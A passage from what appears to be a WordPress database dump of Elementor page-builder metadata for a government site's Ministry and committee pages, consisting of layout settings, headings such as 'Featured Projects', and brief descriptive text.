Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c87beee\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8467a48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"8e89038\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"eef1874\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9390,1639,'_elementor_controls_usage','a:0:{}'),(9391,1639,'_elementor_edit_mode','builder'),(9392,1639,'_elementor_template_type','wp-post'),(9393,1639,'_elementor_version','2.7.5'),(9394,1639,'_wp_page_template','default'),(9395,1639,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"MPW Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0abcc56\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"91f3255\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"49649b6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8f526d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30ec225\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f8f5e4b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"49649b6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2f50533\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7dc41ec\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9396,1640,'_elementor_controls_usage','a:0:{}'),(9397,1640,'_elementor_edit_mode','builder'),(9398,1640,'_elementor_template_type','wp-post'),(9399,1640,'_elementor_version','2.7.5'),(9400,1640,'_wp_page_template','default'),(9401,1640,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0abcc56\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"91f3255\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"49649b6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"8f526d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30ec225\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f8f5e4b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"49649b6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2f50533\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7dc41ec\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9402,1590,'_edit_lock','1634848993:42'),(9403,1588,'_edit_lock','1629243790:42'),(9404,1586,'_edit_lock','1629226358:38'),(9405,1584,'_edit_lock','1631105331:38'),(9406,1641,'_elementor_controls_usage','a:0:{}'),(9407,1641,'_elementor_edit_mode','builder'),(9408,1641,'_elementor_template_type','wp-post'),(9409,1641,'_elementor_version','2.7.5'),(9410,1641,'_wp_page_template','default'),(9411,1641,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a1cd518\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Committee on Natural Resource and Environment<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"Committee Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"055c11c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0b709e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e54035\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f9fd7c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0eac96c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c50620c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e54035\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"7bdc1da\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c46227a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9412,1642,'_elementor_controls_usage','a:0:{}'),(9413,1642,'_elementor_edit_mode','builder'),(9414,1642,'_elementor_template_type','wp-post'),(9415,1642,'_elementor_version','2.7.5'),(9416,1642,'_wp_page_template','default'),(9417,1642,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a1cd518\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"055c11c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0b709e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e54035\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"9f9fd7c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0eac96c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}]